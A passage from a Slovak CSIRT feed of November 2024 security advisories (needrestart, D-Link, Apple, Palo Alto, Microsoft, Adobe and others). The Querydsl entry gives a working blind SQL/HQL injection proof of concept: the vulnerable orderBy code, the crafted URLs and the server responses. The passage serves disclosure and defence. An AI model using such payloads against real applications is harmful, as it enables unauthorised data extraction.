Zraniteľnosti spočívajú v nedostatočnom overovaní obsahu premenných prostredia PYTHONPATH (CVE-2024-48990) a RUBYLIB (CVE-2024-48992) a lokálny autentifikovaný útočník by ich mohol zneužiť na vykonanie škodlivého kódu s oprávneniami úrovne root.

CVE-2024-48991 (CVSS skóre 7,8)

CVE-2024-48991 spočíva v súbehu procesov a lokálny útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu s oprávneniami úrovne root.

CVE-2024-10224, CVE-2024-11003 (CVSS skóre 7,8)

Zraniteľnosti nachádzajúce sa v Perl knižnici Modules::ScanDeps spočívajú v nedostatočnom overovaní používateľských vstupov a možno ich zneužiť na vykonanie systémových príkazov s oprávneniami úrovne root.

Zraniteľnosti objavili bezpečnostní výskumníci zo spoločnosti Qualys.

Možné škody:

Eskalácia privilégií
Vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Odporúčame bezodkladnú aktualizáciu komponentu na verziu 3.8.

V prípade, že aktualizáciu nie možné vykonať, zraniteľnosť možno mitigovať deaktiváciou funkcionality pre skenovanie interpreterov, ktorú možno vykonať modifikáciou konfiguračného súboru /etc/needrestart/needrestart.conf. Parameter $nrconf{interpscan} je potrebné nastaviť na hodnotu 0.

Zdroje:

Kritická zraniteľnosť v routroch D-Link s ukončenou technickou podporou

Marian Danko — Fri, 22 Nov 2024 10:16:58 +0000

Spoločnosť D-Link varovala pred kritickou bezpečnostnou zraniteľnosťou v routroch DSR-150, DSR-150N, DSR-250, DSR-250N a DSR-1000N s ukončenou technickou podporou. Bližšie nešpecifikovaná kritická zraniteľnosť umožňuje vzdialené vykonanie kódu.

Zraniteľné systémy:

D-Link DSR-150 (ukončená technická podpora)
D-Link DSR-150N (ukončená technická podpora)
D-Link DSR-250 (ukončená technická podpora)
D-Link DSR-250N (ukončená technická podpora)
D-Link DSR-500N (ukončená technická podpora)
D-Link DSR-1000N (ukončená technická podpora)

Opis zraniteľnosti:

Bez prideleného CVE identifikátora (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v pretečení medzipamäte zásobníka a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na vykonanie škodlivého kódu.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Nakoľko sa jedná o produkty s ukončenou technickou podporou, spoločnosť D-LINK neplánuje vydať aktualizácie a odporúča prejsť na alternatívne produkty s platnou podporou. V prípade, že prechod na nové produkty nie je možné vykonať ihneď, odporúčame limitovať prístup k manažmentovému rozhraniu zariadení a použitie silných hesiel.

Zdroje:

Aktívne zneužívané zero-day zraniteľnosti v operačných systémoch macOS, iOS, iPadOS a visionOS a prehliadači Safari

Marian Danko — Fri, 22 Nov 2024 08:48:32 +0000

Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú 2 aktívne zneužívané zero-day zraniteľnosti v komponentoch operačných systémov macOS, iOS, iPadOS a visionOS a internetovom prehliadači Safari. CVE-2024-44308 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a CVE-2024-44309 na realizáciu XSS útokov.

Zraniteľné systémy:

iOS 17 vo verziách starších ako 17.7.2
iOS 18 vo verziách starších ako 18.1.1
iPadOS 17 vo verziách starších ako 17.7.2
iPadOS 18 vo verziách starších ako 18.1.1
macOS Sequoia vo verziách starších ako 15.1.1
visionOS vo verziách starších ako 2.1.1
Safari vo verziách starších ako 18.1.1

Opis zraniteľnosti:

CVE-2024-44308 (CVSS skóre 8,8)

Bližšie nešpecifikovanú zraniteľnosť v komponente JavaScriptCode by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na vzdialené vykonanie kódu.

CVE-2024-44309 (CVSS skóre 6,1)

Zraniteľnosť s identifikátorom CVE-2024-44309 spočíva v nedostatočnom manažmente cookies v rámci komponentu WebKit a možno ju zneužiť na realizáciu XSS (Cross Site Scripting) útokov a získanie autentifikačných údajov vo forme cookies.

Zneužitie oboch zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí kliknúť na špeciálne vytvorený URL odkaz alebo otvoriť špeciálne vytvorený webový obsah. Vyššie uvedené zraniteľnosti sú aktívne zneužívané na macOS zariadeniach s procesormi Intel.

Zraniteľnosti objavili bezpečnostní výskumníci z Google Threat Analysis Group.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom

Odporúčania:

Spoločnosť Apple odporúča bezodkladnú aktualizáciu zraniteľných systémov na najnovšiu verziu.

Zdroje:

Zraniteľnosť knižnice Querydsl a OpenFeign Querydsl umožňujúca SQL/HQL injection

Marian Danko — Wed, 20 Nov 2024 14:04:52 +0000

Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť CVE-2024-49203 v Java knižnici Querydsl a OpenFeign Querydsl, ktorá umožňuje vykonávať útoky typu SQL/HQL injection.

Zraniteľné systémy:

querydsl-jpa – 5.1.0
querydsl-apt – 5.1.0
hibernate-core – 6.1.1.Final
jakarta.persistence-api – 3.1.0
postgresql – 42.7.4
OpenFeign querydsl – 6.8

Na uvedených verziách bola zraniteľnosť potvrdené. Nevylučujeme však, že je prítomná aj na ďalších verziách.

Opis činnosti:

CVE-2024-49203

Zraniteľnosť sa nachádza v najnovšej verzii knižnice Querydsl (resp. OpenFeign Querydsl) a súvisí s absenciou ošetrovania používateľských vstupov, ktoré preberá funkcia orderBy(OrderSpecifier order). Táto metóda slúži na usporiadanie výsledkov databázových dopytov. V prípade, že sa premenná order generuje pomocou používateľských vstupov, je možné prostredníctvom tejto premennej vykonávať HQL dopyty.

V prípade, že sa v kóde nachádza nasledujúci úryvok:

OrderSpecifier order = new OrderSpecifier(Order.ASC, pathBuilder.get(orderBy));
JPAQuery orderedQuery = query.orderBy(order);
return orderedQuery.fetch();

kde hodnota premennej orderBy je poskytnutá používateľom, daná aplikácia je zraniteľná.

Keď používateľ navštívi stránku:

:8000/products?orderBy=name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'2')='2'+ORDER+BY+t.id HTTP/1.1

vie vykonať takzvanú blind SQL injection, kde svoj SQL príkaz dá na miesto SELECT+’2′ a následne skúša akej hodnote sa rovná výsledok daného SQL príkazu nahradením ‘2’ za všetky možné hodnoty.

V našom príklade sa vygeneruje nasledovný SQL dopyt:

SELECT t1 FROM Test t1 Order By t1.name INTERSECT SELECT t FROM Test t WHERE (SELECT '2')='2' ORDER BY t.id ASC

V našom príklade by útočník získal všetky hodnoty prítomné v tabuľke Test, keďže (SELECT+’2′)=’2′ sa vyhodnotí ako True a teda sa spraví prienik všetkých prvkov v tabuľke Test t1 a Test t, ktorý je rovný všetkým prvkom v tabuľke Test.

Odpoveď by teda vyzerala nasledovne:

HTTP/1.1 200
Content-Type: application/json
Date: Tue, 08 Oct 2024 13:34:57 GMT
Content-Length: 27


[{"id":1,"name":"test123"}]

V prípade, že navštívime stránku:

:8000/products?orderBy=name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'1')='2'+ORDER+BY+t.id HTTP/1.1

Kde sa podmienka vo WHERE časti vyhodnotí ako False dostaneme nasledovnú odpoveď:

HTTP/1.1 200
Content-Type: application/json
Date: Tue, 08 Oct 2024 13:36:30 GMT
Content-Length: 2

[]

Zraniteľnosť bola overovaná s použitím nasledujúcich verzií knižníc:

querydsl-jpa – 5.1.0
querydsl-apt – 5.1.0
hibernate-core – 6.1.1.Final
jakarta.persistence-api – 3.1.0
postgresql – 42.7.4
OpenFeign querydsl – 6.8

O existencii zraniteľnosti sme informovali autorov knižnice 9. 10. 2024.

Možné škody:

Únik citlivých informácií
Denial of service

Odporúčania:

Pokiaľ pri vývoji webovej aplikácie v jazyku Java využívate knižnicu Querydsl (resp. OpenFeign Querydsl) a používate metódu orderBy s použitím používateľských vstupov, odporúčame dodatočne ošetriť používateľské vstupy v rámci best practice bezpečného vývoja.

Odkaz:

https://nvd.nist.gov/vuln/detail/CVE-2024-49203

Aktívne zneužívaná kritická zraniteľnosť zariadení GeoVision

Marian Danko — Mon, 18 Nov 2024 13:28:28 +0000

Viacero produktov spoločnosti GeoVision s ukončenou podporou zneužívajú útočníci pre variant botnetu MIRAI. Infekcia prebieha po zneužití kritickej zraniteľnosti, ktorá umožňuje vykonávanie systémových príkazov bez autentifikácie.

Zraniteľné systémy:

GV-VS12
GV-VS11
GV-DSP_LPR_V3
GVLX 4 V2
GVLX 4 V3

Opis činnosti:

CVE-2024-11120 (CVSS skóre 9,8)

Útočníci aktívne zneužívajú zero-day zraniteľnosť produktov GeoVision GV-VS12, GV-VS11, GV-DSP LPR V3, GV-LX4C V2 a GV-LX4C V3 s ukončenou technickou podporou na ich infekciu a zapojenie do variantu botnetu MIRAI, ktorý slúži pre realizáciu DDoS útokov a ťažbu kryptomien. Kritickú zraniteľnosť s označením CVE-2024-11120 by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu a vykonávanie systémových príkazov a získanie úplnej kontroly nad zariadením. Nakoľko sa jedná o produkty s ukončenou podporou, výskumníci odporúčajú prechod na alternatívne produkty alebo limitovať prístup k zraniteľným systémom prostredníctvom sieťových a bezpečnostných prvkov.

Možné škody:

Vykonávanie ľubovoľných príkazov
Získanie kontroly nad zariadením

Odporúčania:

Zraniteľné zariadenia už výrobca nepodporuje, preto odporúčame bezodkladnú výmenu za podporované alternatívy.

Odkazy:

Kritická zraniteľnosť modulu WordPress Really Simple Security

Marian Danko — Fri, 15 Nov 2024 15:41:44 +0000

Vývojári modulu WordPress Really Simple Security opravili kritickú zraniteľnosť, ktorá umožňuje neprihlásenému útočníkovi získať prístup do zraniteľného systému ako ľubovoľný používateľ, vrátane administrátora.

Zraniteľné systémy:

WordPress Really Simple Security (Free, Pro a Pro Multisite) 9.0.0 – 9.1.1.1

Zraniteľnosť je prítomná, keď je povolené dvojfaktorové overovanie.

Opis činnosti:

CVE-2024-10924 (CVSS skóre 9,8)

Modul WordPress Really Simple Security obsahuje kritickú zraniteľnosť, ktorá dovoľuje obchádzanie autentifikácie. Zraniteľnosť súvisí s nevhodným spracovaním chýb pri kontrole používateľov vo funkcii check_login_and_get_user, ktorá je súčasťou REST API pre dvojfaktorové overovanie. Pri zlyhaní prihlásenia chyba spôsobí, že používateľ je napriek tomu prihlásený do konta podľa zadaného ID. Neautentifikovaný útočník sa tak môže do zraniteľnej inštancie prihlásiť ako ľubovoľný používateľ, vrátane administrátora.

Podľa spoločnosti Defiant sú potenciálne zraniteľné približne 4 milióny webstránok.

Možné škody:

Obídenie autentifikácie

Odporúčania:

Bezodkladná aktualizácia WordPress Really Simple Security (Free, Pro a Pro Multisite) aspoň na verziu 9.1.2.

Odkazy:

Závažná zraniteľnosť PostgreSQL umožňuje vykonávať kód

Marian Danko — Fri, 15 Nov 2024 15:36:12 +0000

V PostgreSQL bola opravená vysoko závažná zraniteľnosť súvisiaca s nevhodnou kontrolou premenných prostredia v PL/Perl. Jej zneužitím môže útočník získať schopnosť vykonávať ľubovoľný kód, získať citlivé informácie, alebo vykonať inú činnosť v závislosti napríklad od zneužitej premennej.

Zraniteľné systémy:

PostgreSQL verzie staršie ako 17.1, 16.5, 15.9, 14.14, 13.17 a 12.21

Opis činnosti:

CVE-2024-10979 (CVSS skóre 8,8)

Vývojári PostgreSQL opravili vysoko závažnú zraniteľnosť v module PL/Perl, ktorá súvisí s nevhodnou kontrolou premenných prostredia jazyka Perl. Útočník s nízkymi oprávneniami môže tieto premenné meniť, napríklad môže pozmeniť premennú „PATH“, čím môže docieliť presmerovanie ku podvrhnutým škodlivým súborom a ich následným spustením vykonanie ľubovoľného kódu. Zraniteľnosť môže viesť tiež k úniku citlivých informácií a iným škodám.

Aktualizácie opravujú aj ďalšie tri zraniteľnosti z nižšou závažnosťou. Tieto umožňujú zvýšenie oprávnení a podvrhnutie a neautorizovanú úpravu dát.

Možné škody:

Vykonanie ľubovoľného kódu
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia PostgreSQL aspoň na verziu 17.1, 16.5, 15.9, 14.14, 13.17 alebo 12.21.

Zraniteľnosť môžete mitigovať obmedzením množiny povolených rozšírení (povolenia CREATE EXTENSIONS) a nastavením parametra shared_preload_libraries pre načítanie iba vyžadovaných rozšírení.

Odkazy:

Aktívne zneužívaná kritická zraniteľnosť Palo Alto

Marian Danko — Fri, 15 Nov 2024 15:31:00 +0000

Spoločnosť Palo Alto vydala varovanie ohľadom bližšie nešpecifikovanej kritickej zraniteľnosti v manažmentovom rozhraní firewallov, ktorá umožňuje vzdialené vykonávanie príkazov. Zraniteľnosť je aktívne zneužívaná a existuje na ňu verejne dostupný exploit.
[Aktualizované 22.11.2024]

Zraniteľné systémy:

PAN-OS verzie staršej ako 10.2.12-h2, 11.0.6-h1, 11.1.5-h1 a 11.2.4-h1

Prisma Access a Cloud NGFW by podľa výrobcu nemali byť ovplyvnené.

Opis činnosti:

CVE-2024-0012 (CVSSv4.0 skóre 9,3)

Spoločnosť Palo Alto informovala o kritickej zraniteľnosti, ktorá umožňuje neautentifikovaným útočníkom vzdialene vykonávať príkazy v manažmentovom rozhraní firewallov. Bližšie informácie spoločnosť neuverejnila.

Palo Alto upozorňuje, že zraniteľnosť aktívne zneužívajú útočníci. Útoky smerujú na manažmentové rozhrania firewallov dostupné z internetu. Pre zraniteľnosť existuje verejne dostupný exploit.

Možné škody:

Vzdialené vykonávanie príkazov

Odporúčania:

V súčasnosti Palo Alto pripravuje opravné aktualizácie. Do ich vydania spoločnosť odporúča zabezpečiť prístup ku manažmentovému rozhraniu podľa jej best practices.
Aktualizácia 20.11.2024: Spoločnosť vydala aktualizácie pre PAN-OS, ktoré zraniteľnosť opravujú. Bezodkladne aktualizujte PAN-OS aspoň na verziu 10.2.12-h2, 11.0.6-h1, 11.1.5-h1 alebo 11.2.4-h1. Palo Alto vydala opravy aj pre viaceré pod-verzie. Kompletný zoznam nájdete tu.

Indikátory kompromitácie:

IP (viaceré patria poskytovateľom VPN, teda nemusia súvisieť nevyhnutne s útokom):
91.208.197[.]167
104.28.208[.]123
136.144.17[.]146
136.144.17[.]149
136.144.17[.]154
136.144.17[.]158
136.144.17[.]161
136.144.17[.]164
136.144.17[.]166
136.144.17[.]167
136.144.17[.]170
136.144.17[.]176
136.144.17[.]177
136.144.17[.]178
136.144.17[.]180
173.239.218[.]248
173.239.218[.]251
209.200.246[.]173
209.200.246[.]184
216.73.162[.]69
216.73.162[.]71
216.73.162[.]73
216.73.162[.]74

PHP webshell (SHA256):
3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668

Odkazy:

Microsoft v rámci novembrového Patch Tuesday opravil 4 kritické zraniteľnosti

Marian Danko — Thu, 14 Nov 2024 14:20:12 +0000

Spoločnosť Microsoft vydala v novembri 2024 balík opráv pre portfólio svojich produktov opravujúci 89 zraniteľností, z ktorých 52 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú vo frameworku .NET, produkte Visual Studio, komponentoch Windows VMSwitch a Window Kerberos a online platforme airlift.microsoft.com a možno ich zneužiť na eskaláciu privilégií a vzdialené vykonanie škodlivého kódu. Zraniteľnosti v komponentoch Windows NT LAN Manager (CVE-2024-43451) a Windows Task Scheduler (CVE-2024-49039) sú aktívne zneužívané útočníkmi.

Zraniteľné systémy:

.NET 9.0 inštalované na Linux
Azure CycleCloud 8.0.0 – 8.0.2
Azure CycleCloud 8.1.0 – 8.1.1
Azure CycleCloud 8.2.0 – 8.2.2
Azure CycleCloud 8.3.0
Azure CycleCloud 8.4.0 – 8.4.2
Azure CycleCloud 8.5.0
Azure CycleCloud 8.6.0 – 8.6.4
Azure Database for PostgreSQL Flexible Server 12
Azure Database for PostgreSQL Flexible Server 13
Azure Database for PostgreSQL Flexible Server 14
Azure Database for PostgreSQL Flexible Server 15
Azure Database for PostgreSQL Flexible Server 16
Azure Linux 3.0 ARM
Azure Linux 3.0 x64
CBL Mariner 2.0 ARM
CBL Mariner 2.0 x64
LightGBM
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Defender for Endpoint for Android
Microsoft Defender for Endpoint for iOS
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Excel 2016 Click-to-Run (C2R) for 32-bit editions
Microsoft Excel 2016 Click-to-Run (C2R) for 64-bit editions
Microsoft Exchange Server 2016 Cumulative Update 23
Microsoft Exchange Server 2019 Cumulative Update 13
Microsoft Exchange Server 2019 Cumulative Update 14
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft Office Online Server
Microsoft PC Manager
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack
Microsoft SQL Server 2017 for x64-based Systems (CU 31)
Microsoft SQL Server 2017 for x64-based Systems (GDR)
Microsoft SQL Server 2019 for x64-based Systems (CU 29)
Microsoft SQL Server 2019 for x64-based Systems (GDR)
Microsoft SQL Server 2022 for x64-based Systems (CU 15)
Microsoft SQL Server 2022 for x64-based Systems (GDR)
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft TorchGeo
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.11
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.8
Microsoft Word 2016 (32-bit edition)
Microsoft Word 2016 (64-bit edition)
Python extension for Visual Studio Code
Visual Studio Code Remote – SSH Extension
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)
airlift.microsoft.com

Opis činnosti:

I. Kritické zraniteľnosti:

CVE-2024-43498 (CVSS skóre 9,8)

Kritická zraniteľnosť v frameworku .NET a produkte Visual Studio spočíva v nesprávnom vyhodnocovaní dátových typov a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu. Zraniteľnosť možno zneužiť zaslaním špeciálne vytvorenej požiadavky na zraniteľnú webovú aplikáciu vytvorenú v .NET alebo nahraním špeciálne vytvoreného súboru do desktopovej aplikácie Visual Studio.

CVE-2024-43625 (CVSS skóre 8,1)

Kritickú zraniteľnosť v komponente Windows VMSwitch, ktorý je súčasťou hypervízora Hyper-V, možno zneužiť na eskaláciu privilégií na úroveň oprávnení SYSTEM a následné vykonanie škodlivého kódu. Lokálny útočník by predmetnú zraniteľnosť mohol zneužiť zaslaním špeciálne vytvorenej sekvencie sieťových požiadaviek na ovládač VMSwitch, ktoré by umožnili použitie odalokovaného miesta v pamäti na Hyper-V hoste.

CVE-2024-43639 (CVSS skóre 9,8)

CVE-2024-43639 spočíva v chybnom skracovaní čísel pri konverzii dátových typov v kryptografickom protokole použitom v rámci komponentu Windows Kerberos. Vzdialený neautentifikovaný útočník by ju prostredníctvom špeciálne vytvorenej aplikácie mohol zneužiť na vzdialené vykonanie kódu.

CVE-2024-49056 (CVSS skóre 7,3)

Zraniteľnosť online platformy airlift.microsoft.com spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií na platorme. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.

II. Aktívne zneužívané zraniteľnosti:

CVE-2024-43451 (CVSS skóre 6,5)

Zraniteľnosť v komponente Windows NT LAN Manager by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvoreného súboru mohol zneužiť na získanie NTLMv2 hashu obete, ktorý možno v rámci spoofing útokov zneužiť na získanie neoprávneného prístupu do systému. Zneužitie zraniteľnosť vyžaduje interakciu zo strany používateľa, ktorý musí na škodlivý súbor kliknúť.

CVE-2024-49039 (CVSS skóre 8,8)

Windows Task Scheduler obsahuje zraniteľnosť spočívajúcu v nesprávnej implementácii mechanizmov autentifikácie, ktorá umožňuje eskaláciu privilégií na úroveň oprávnení Medium Integrity Level a následné vykonanie RPC (Remote Procedure Call) volaní. Lokálny autentifikovaný útočník by ju mohol zneužiť spustením špeciálne vytvorenej aplikácie v rámci AppContainer.

III. Významné vysoko závažné zraniteľnosti:

CVE-2024-49040 (CVSS skóre 7,5)

Vysoko závažná zraniteľnosť v Microsoft Exchange Server spočíva v nesprávnom overovaní poľa P2 FROM e-mailových hlavičiek a vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu e-mailových spoofing útokov. Zraniteľnosť umožňuje zobrazenie ľubovoľnej adresy odosielateľa v používateľskom rozhraní e-mailových klientov. Na uvedenú zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci návod pre jej zneužitie. Bližšie informácie o zraniteľnosti sú dostupné na stránke spoločnosti Microsoft a blogu bezpečnostného výskumníka Slonser, ktorý ju odhalil.

CVE-2024-49019 (CVSS skóre 7,8)

Zraniteľnosť v rámci Active Directory Certificate Services umožňuje lokálnemu autentifikovanému útočníkovi zneužiť zabudované templaty certifikátov (napr. WebServer template) na vytvorenie CSR (Certificate Signing Request) požiadaviek vedúcich k eskalácii privilégií na úroveň doménového administrátora. Zraniteľné sú všetky certifikáty vytvorené použitím templatu verzie 1, na ktorých je pole „Source of subject name“ nastavené na hodnotu „Supplied in the request“ a templaty nie sú zabezpečené podľa návodu pre zabezpečenie PKI od spoločnosti Microsoft. Zraniteľnosť objavili bezpečnostní výskumníci zo spoločnosti TrustedSec, ktorá zverejnila aj kompletnú analýzu.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby
Obídenie bezpečnostného prvku
Spoofing

Odporúčania:

Bezodkladné nasadenie augustového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete tu.

Zdroje:

Bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Thu, 14 Nov 2024 14:02:21 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Adobe Bridge, Audition, After Effects, Substance 3D Painter, Illustrator, InDesign, Photoshop a Commerce, ktoré opravujú 48 zraniteľností, z čoho 28 sú označené ako kritické. Najzávažnejšie zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu. Ostatné zraniteľnosti umožňujú získanie neoprávneného prístupu k citlivým údajom, obídenie bezpečnostných prvkov a zneprístupnenie služby.

Zraniteľné systémy:

Adobe Bridge vo verziách starších ako 15.0
Adobe Bridge vo verziách starších ako 14.1.3
Adobe Audition vo verziách starších ako 25.0
Adobe Audition vo verziách starších ako 24.6.3
Adobe After Effects vo verziách starších ako 25.0
Adobe After Effects vo verziách starších ako 24.6.3
Adobe Substance 3D Painter vo verziách starších ako 10.1.1
Adobe Illustrator 2024 vo verziách starších ako 29.0.0
Adobe Illustrator 2024 vo verziách starších ako 28.7.2
Adobe InDesign vo verziách starších ako ID20.0
Adobe InDesign vo verziách starších ako ID18.5.4
Adobe InDesign vo verziách starších ako ID18.5.3
Adobe Commerce a Magento Open Source vo verziách starších ako 3.2.6 (prevádzkované ako software-as-a-service prostredníctvom Adobe Commerce Services)
Adobe Photoshop 2023 vo verziách starších ako 24.7.4
Adobe Photoshop 2024 vo verziách starších ako 25.12

Opis zraniteľnosti:

Adobe Substance 3D Painter:

CVE-2024-49525, CVE-2024-49519, CVE-2024-47426, CVE-2024-47427, CVE-2024-47428, CVE-2024-47429, CVE-2024-47430, CVE-2024-49515, CVE-2024-49516, CVE-2024-47431, CVE-2024-49517, CVE-2024-47432, CVE-2024-49518, CVE-2024-49520, CVE-2024-47433, CVE-2024-47434 (CVSS skóre 7,8)

Bezpečnostné zraniteľnosti v produkte Substance 3D Painter spočívajúce v nedostatočnom overovaní vyhľadávacích ciest (CVE-2024-49515), dvojitom uvoľnení pamäte (CVE-2024-47426), pretečení medzipamäte haldy (CVE-2024-49525, CVE-2024-47431, CVE-2024-49517) a zápise mimo povolených hodnôt (ostatné) možno zneužiť na vykonanie škodlivého kódu.

Adobe After Effects:

CVE-2024-47441, CVE-2024-47442, CVE-2024-47443 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v zápise mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.

Adobe Illustrator:

CVE-2024-45114, CVE-2024-47450, CVE-2024-47451, CVE-2024-47452 (CVSS skóre 7,8)

Zraniteľnosť spočívajúcu v zápise mimo povolených hodnôt a pretečení medzipamäte haldy možno zneužiť na vykonanie škodlivého kódu.

Adobe InDesign:

CVE-2024-49507, CVE-2024-49508, CVE-2024-49509 (CVSS skóre 7,8)

Uvedené zraniteľnosti spočívajú v pretečení medzipamäte haldy a umožňujú vykonanie škodlivého kódu.

Adobe Photoshop

CVE-2024-49514 (CVSS skóre 7,8)

Podtečenie celočíselnej premennej možno zneužiť na vykonanie škodlivého kódu.

Zneužitie vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a otvoriť špeciálne vytvorené súbory.

Adobe Commerce a Magento Open Source:

CVE-2024-49521 (CVSS skóre 7,7)

Bližšie nešpecifikovanú zraniteľnosť by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených požiadaviek zo zraniteľných serverov na interné systémy mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov a obídenie bezpečnostných prvkov.

Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

Možné škody:

Vykonanie škodlivého kódu
Neoprávnený prístup k citlivým údajom
Obídenie bezpečnostných prvkov
Zneprístupnenie služby

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov.

Zdroje:

Kritická zraniteľnosť v routroch D-Link DSL6740C s ukončenou technickou podporou

Marian Danko — Thu, 14 Nov 2024 13:49:31 +0000

Bezpečnostní výskumníci zverejnili informácie o 7 zraniteľnostiach routrov D-LINK DSL6740C, z ktorých jedna je označená ako kritická. Kritickú zraniteľnosť CVE-2024-11068 možno zneužiť na získanie úplnej kontroly na zariadením. Ostatné zraniteľnosti možno zneužiť na injekciu príkazov a získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

D-Link DSL6740C (ukončená technická podpora)

Opis zraniteľnosti:

CVE-2024-11068 (CVSS skóre 9,8)

Kritická zraniteľnosť s označením CVE-2024-11068 spočíva v nedostatočnom zabezpečení privilegovaného API a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na zmenu hesiel ľubovoľných používateľov a získanie úplnej kontroly nad zariadením.

CVE-2024-11067 (CVSS skóre 7,5)

CVE-2024-11067 možno zneužiť na čítanie systémových súborov zariadenia a získanie neoprávneného prístupu k citlivým údajom. Zo systémových súborov možno extrahovať aj MAC adresu zariadenia, ktorá je predvoleným heslom pre prístup do administratívneho rozhrania.

CVE-2024-11066, CVE-2024-11062, CVE-2024-11063, CVE-2024-11064, CVE-2024-11065 (CVSS skóre 7,2)

Bližšie nešpecifikované zraniteľnosti by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na injekciu systémových príkazov prostredníctvom webového rozhrania (CVE-2024-11066) alebo SSH a TELNET spojenia (CVE-2024-11062, CVE-2024-11063, CVE-2024-11064 a CVE-2024-11065).

Možné škody:

Neoprávnená zmena v systéme
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom
Injekcia príkazov
Neoprávnený prístup k citlivým údajom

Odporúčania:

Zdroje:

Kritické bezpečnostné zraniteľnosti v produktoch Ivanti EPM, ICS a IPS

Marian Danko — Thu, 14 Nov 2024 13:39:40 +0000

